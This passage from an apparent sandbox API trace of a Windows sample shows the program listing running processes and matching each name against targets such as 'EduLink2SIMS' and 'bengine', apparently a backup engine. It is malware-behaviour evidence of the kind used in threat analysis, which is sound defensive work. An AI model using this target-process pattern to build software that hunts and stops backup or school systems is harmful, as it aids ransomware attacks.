lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0101.035] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0101.035] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.036] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0101.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.037] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356ea78 [0101.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x356ea78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0101.037] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0101.037] StrStrIA (lpFirst="utg2.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.037] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0101.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.038] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356eb50 [0101.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x356eb50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0101.038] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0101.039] StrStrIA (lpFirst="saying.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.039] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0101.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.040] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356ebe0 [0101.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x356ebe0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0101.040] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0101.040] StrStrIA (lpFirst="ripe.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.040] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0101.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.042] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356ec28 [0101.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x356ec28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0101.042] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0101.042] StrStrIA (lpFirst="acoustic.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.042] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0101.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.043] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356eaa8 [0101.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x356eaa8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0101.043] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0101.043] StrStrIA (lpFirst="mail.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.043] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0101.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.044] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356eaf0 [0101.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x356eaf0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0101.044] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0101.044] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.044] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.045] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ea18 [0101.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356ea18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.045] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.045] StrStrIA (lpFirst="svchost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.045] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0101.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.046] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356eac0 [0101.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x356eac0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.046] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0101.046] StrStrIA (lpFirst="dllhost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.046] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0101.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.047] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356ea30 [0101.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356ea30, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0101.047] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0101.047] StrStrIA (lpFirst="taskhostw.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.047] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0101.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.048] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356ea48 [0101.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x356ea48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0101.048] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0101.048] StrStrIA (lpFirst="UsoClient.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.048] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0101.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.049] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356edc0 [0101.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356edc0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0101.049] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0101.049] StrStrIA (lpFirst="taskhostw.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.049] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0101.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0101.050] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x357eec0 [0101.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x357eec0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0101.050] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0101.050] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.051] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0101.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.051] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357ee60 [0101.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x357ee60, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0101.052] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0101.052] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.052] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0101.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0101.053] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x357e8c0 [0101.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x357e8c0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0101.053] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0101.053] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.053] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.054] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ed18 [0101.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x356ed18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.054] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0101.054] StrStrIA (lpFirst="conhost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.054] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.055] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ee08 [0101.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x356ee08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.055] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0101.055] StrStrIA (lpFirst="conhost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.055] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0101.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.056] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356ed30 [0101.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x356ed30, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0101.056] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0101.056] StrStrIA (lpFirst="rxodge.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.056] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.057] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356ef10 [0101.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x356ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0101.057] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0101.057] StrStrIA (lpFirst="sppsvc.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.057] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0101.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.058] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357efc0 [0101.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x357efc0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0101.059] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0101.059] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.059] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0101.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.059] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356ed48 [0101.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x356ed48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0101.060] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0101.060] StrStrIA (lpFirst="TiWorker.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.060] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 0 [0101.060] CloseHandle (hObject=0x358) returned 1 [0101.060] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0101.296] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.297] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357f0a0 [0101.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x357f0a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0101.297] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0101.297] StrStrIA (lpFirst="[System Process]", lpSrch="bengine") returned 0x0 [0101.297] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0101.298] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x357e208 [0101.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x357e208, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0101.298] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0101.298] StrStrIA (lpFirst="System", lpSrch="bengine") returned 0x0 [0101.298] Process32NextW (in: hSnapshot=0x350, 